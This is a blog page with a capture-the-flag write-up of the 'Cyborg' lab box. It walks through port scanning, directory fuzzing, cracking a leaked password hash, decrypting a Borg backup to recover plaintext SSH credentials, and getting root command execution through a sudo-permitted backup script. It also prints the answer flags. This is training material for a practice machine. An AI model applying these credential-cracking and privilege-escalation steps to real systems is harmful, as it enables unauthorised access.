<!doctype html><html lang="en" data-mode="dark"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7"><meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover" ><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Cyborg" /><meta name="author" content="Ibrahim" /><meta property="og:locale" content="en" /><meta name="description" content="A box involving encrypted archives, source code analysis, and more." /><meta property="og:description" content="A box involving encrypted archives, source code analysis, and more." /><link rel="canonical" href="/posts/cyborg/" /><meta property="og:url" content="/posts/cyborg/" /><meta property="og:site_name" content="Ibrahim EO." /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-02-12T00:00:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Cyborg" /><meta name="twitter:site" content="@twitter_username" /><meta name="twitter:creator" content="@Ibrahim" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Ibrahim"},"dateModified":"2024-02-12T00:00:00+01:00","datePublished":"2024-02-12T00:00:00+01:00","description":"A box involving encrypted archives, source code analysis, and more.","headline":"Cyborg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/cyborg/"},"url":"/posts/cyborg/"}</script><title>Cyborg | Ibrahim EO.</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Ibrahim EO."><meta name="application-name" content="Ibrahim EO."><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="/assets/css/elomarii-portfolio.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.27.20/dist/tocbot.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css"><body><aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end"><header class="profile-wrapper"> <a href="/" id="avatar" class="rounded-circle"><img src="/assets/avatar.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a><h1 class="site-title"> <a href="/whoami">Ibrahim EO.</a></h1><p class="site-subtitle fst-italic mb-0">InfoSec Enthousiaste</p></header><nav class="flex-column flex-grow-1 w-100 ps-0"><ul class="nav"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/projects/" class="nav-link"> <i class="fa-fw fas fa-bars-progress"></i> <span>PROJECTS</span> </a><li class="nav-item"> <a href="/blog/" class="nav-link"> <i class="fa-fw fas fa-newspaper"></i> <span>BLOG</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/whoami/" class="nav-link"> <i class="fa-fw fas fa-chess-rook"></i> <span>WHOAMI</span> </a></ul></nav><div class="sidebar-bottom d-flex flex-wrap align-items-center w-100"> <a href="https://github.com/elomarii" aria-label="github" target="_blank" rel="noopener noreferrer" > <i class="fab fa-github"></i> </a> <a href="https://www.linkedin.com/in/ibrahim-el-omari/" aria-label="linkedin" target="_blank" rel="noopener noreferrer" > <i class="fab fa-linkedin"></i> </a> <a href="javascript:location.href = 'mailto:' + ['i.ibrahim.elomari','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a></div></aside><div id="main-wrapper" class="d-flex justify-content-center"><div class="container d-flex flex-column px-xxl-5"><header id="topbar-wrapper" aria-label="Top Bar"><div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100" ><nav id="breadcrumb" aria-label="Breadcrumb"> <span> <a href="/">Home</a> </span> <span>Cyborg</span></nav><button type="button" id="sidebar-trigger" class="btn btn-link"> <i class="fas fa-bars fa-fw"></i> </button><div id="topbar-title"> Post</div><button type="button" id="search-trigger" class="btn btn-link"> <i class="fas fa-search fa-fw"></i> </button> <search id="search" class="align-items-center ms-3 ms-lg-0"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..." > </search> <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button></div></header><div class="row flex-grow-1"><main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4"><article class="px-1"><header><h1 data-toc-skip>Cyborg</h1><p class="post-desc fw-light mb-4">A box involving encrypted archives, source code analysis, and more.</p><div class="post-meta text-muted"> <span> Posted <time data-ts="1707692400" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom" > Feb 12, 2024 </time> </span><div class="d-flex justify-content-between"> <span> By <em> Ibrahim </em> </span><div> <span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="720 words" > <em>4 min</em> read</span></div></div></div></header><div class="content"><p>Nmap scan:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre>$ sudo nmap -sV -sC &lt;target_ip&gt;
                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-12 15:58 UTC
Nmap scan report for &lt;target_ip&gt;
Host is up (0.077s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p>The machine runs a web server. We navigate to the hosted website and find out that it contains the default Apache page set up after initialization.</p><p><a href="https://github.com/elomarii/ctf4day/assets/106914699/b04e3548-89f0-4adc-a732-1e13475c0e24" class="popup img-link shimmer"><img src="https://github.com/elomarii/ctf4day/assets/106914699/b04e3548-89f0-4adc-a732-1e13475c0e24" alt="771159b35c97e429247aac754ad44bf06cc1efa8" loading="lazy"></a></p><p>We can enumerate for other content hosted by the machine.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre>$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u "http://&lt;target_ip&gt;/FUZZ" 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://&lt;target_ip&gt;/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

admin                   [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 71ms]
etc                     [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 68ms]

</pre></table></code></div></div><p>We were able to find two directories. When navigating to the admin portal, we find a downloadable Borg backup of the website called. The archive is encrypted and needs a passphrase for decryption.</p><p>Let’s check the etc directory. This contains a configuration file of a Squid proxy and a passwd file. The passwd file contains a hash of the <code class="language-plaintext highlighter-rouge">music_archive</code> user’s password.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
</pre></table></code></div></div><p>We successfully crack the password using <code class="language-plaintext highlighter-rouge">hashcat</code> and the <code class="language-plaintext filepath highlighter-rouge">rockyou</code> wordlist. The password is <code class="language-plaintext highlighter-rouge">squidward</code>.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre>$ hashcat -m 1600 -a 0 hash /usr/share/wordlists/rockyou.txt 

&lt;...snip...&gt;
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 7 secs

$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward

&lt;...snip...&gt;
</pre></table></code></div></div><p>Back to our music archive, we find out that the backup was made using the above password, and now can recover the archive’s data using <code class="language-plaintext highlighter-rouge">borg</code> command line utility.</p><p>To list all the backups in the archive:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>$ borg list final_archive
  
Enter passphrase for key /home/kali/Downloads/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
</pre></table></code></div></div><p>Now let’s extract the data. Note that the command is executed from <code class="language-plaintext filepath highlighter-rouge">dev</code> sub-folder and that the output of the command will be written in the same location as well.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>$ borg extract final_archive::music_archive
</pre></table></code></div></div><p>Content of the backup:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>$ tree
.
└── alex
    ├── Desktop
    │   └── secret.txt
    ├── Documents
    │   └── note.txt
    ├── Downloads
    ├── Music
    ├── Pictures
    ├── Public
    ├── Templates
    └── Videos

</pre></table></code></div></div><p>The content of the secrete was a bit disappointing XD</p><div file="secret.txt" class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="secret.txt"><i class="far fa-file-code fa-fw"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>shoutout to all the people who have gotten to this stage whoop whoop!"
</pre></table></code></div></div><p>However, the note is giving valuable information</p><div file="note.txt" class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="note.txt"><i class="far fa-file-code fa-fw"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3
</pre></table></code></div></div><p>Since the above are Alex credentials, we can try connecting via ssh.</p><p>In the home directory, we find the user flag: <code class="language-plaintext highlighter-rouge">flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}</code></p><p>Left is the root flag. Making use of the given hint “There might be an interesting file running as root” and checking our Alex permissions, we find that the script <code class="language-plaintext filepath highlighter-rouge">backup.sh</code> can be run as a root.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>$ sudo -l

Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
</pre></table></code></div></div><p>That script can execute any given command following the <code class="language-plaintext highlighter-rouge">-c</code> option. Using this we can enumerate files in the root repository.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>$ sudo ./mp3backups/backup.sh -c "ls /root"

&lt;...snip...&gt;
Backup finished

root.txt
</pre></table></code></div></div><p>Finally the root flag: <code class="language-plaintext highlighter-rouge">flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}</code></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw me-1"></i> <a href="/blog/ctf-writeups/">CTF Writeups</a>, <a href="/blog/try-hack-me/">Try Hack Me</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw me-1"></i> <a href="/tags/hashcat/" class="post-tag no-text-decoration" >hashcat</a> <a href="/tags/borg/" class="post-tag no-text-decoration" >borg</a></div><div class=" post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2 " ><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper d-flex align-items-center"> <span class="share-label text-muted">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Cyborg%20-%20Ibrahim%20EO.&url=%2Fposts%2Fcyborg%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter"> <i class="fa-fw fa-brands fa-square-x-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Cyborg%20-%20Ibrahim%20EO.&u=%2Fposts%2Fcyborg%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=%2Fposts%2Fcyborg%2F&text=Cyborg%20-%20Ibrahim%20EO." target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip" data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!" > <i class="fa-fw fas fa-link pe-none fs-6"></i> </button> </span></div></div></div></article></main><aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted"><div class="access"><section id="access-lastmod"><h2 class="panel-heading">Recently Updated</h2><ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2"><li class="text-truncate lh-lg"> <a href="/posts/itsy-bitsy/">ItsyBitsy</a><li class="text-truncate lh-lg"> <a href="/posts/k-cessation/">K-Cessation</a><li class="text-truncate lh-lg"> <a href="/posts/race-condition/">Race Conditions Challenge</a><li class="text-truncate lh-lg"> <a href="/projects/attack-titan/">The Attack Titan</a><li class="text-truncate lh-lg"> <a href="/posts/wonderland/">Wonderland</a></ul></section><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a> <a class="post-tag btn btn-outline-primary" href="/tags/des/">DES</a></div></section></div></aside></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4"><aside id="related-posts" aria-labelledby="related-label"><h3 class="mb-4" id="related-label">Further Reading</h3><nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4"><article class="col"> <a href="/posts/overpass-3-hosting/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710284400" data-df="ll" > Mar 13, 2024 </time><h4 class="pt-0 my-2">Overpass 3 Hosting</h4><div class="text-muted"><p>You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security...</p></div></div></a></article><article class="col"> <a href="/posts/overpass-2-hacked/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710198000" data-df="ll" > Mar 12, 2024 </time><h4 class="pt-0 my-2">Overpass 2 Hacked</h4><div class="text-muted"><p>Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the a...</p></div></div></a></article><article class="col"> <a href="/posts/overpass/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710025200" data-df="ll" > Mar 10, 2024 </time><h4 class="pt-0 my-2">Overpass</h4><div class="text-muted"><p>What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!</p></div></div></a></article></nav></aside><nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation"> <a href="/posts/double-des/" class="btn btn-outline-primary" aria-label="Older" ><p>Double DES</p></a> <a href="/posts/agent-sudo/" class="btn btn-outline-primary" aria-label="Newer" ><p>Agent Sudo</p></a></nav><footer aria-label="Site Info" class=" d-flex flex-column justify-content-center text-muted flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3 " ><p>© <time>2024</time> <a href="https://github.com/elomarii">Ibrahim El Omari</a>. <span data-bs-toggle="tooltip" data-bs-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author." >Some rights reserved.</span></p><p>Using the <a data-bs-toggle="tooltip" data-bs-placement="top" title="v7.0.1" href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener" >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.</p></footer></div></div><div id="search-result-wrapper" class="d-flex justify-content-center d-none"><div class="col-11 content"><div id="search-hints"><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a> <a class="post-tag btn btn-outline-primary" href="/tags/des/">DES</a></div></section></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><aside aria-label="Scroll to Top"> <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow"> <i class="fas fa-angle-up"></i> </button></aside></div><div id="mask"></div><aside id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-bs-animation="true" data-bs-autohide="false" ><div class="toast-header"> <button type="button" class="btn-close ms-auto" data-bs-dismiss="toast" aria-label="Close" ></button></div><div class="toast-body text-center pt-0"><p class="px-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></aside><script src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.11/dayjs.min.js,npm/dayjs@1.11.11/locale/en.min.js,npm/dayjs@1.11.11/plugin/relativeTime.min.js,npm/dayjs@1.11.11/plugin/localizedFormat.min.js"></script> <script src="/assets/js/dist/post.min.js"></script> <script defer src="/app.min.js"></script> <script>SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<article class="px-1 px-sm-2 px-lg-4 px-xl-0"><header><h2><a href="{url}">{title}</a></h2><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div></header><p>{snippet}</p></article>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
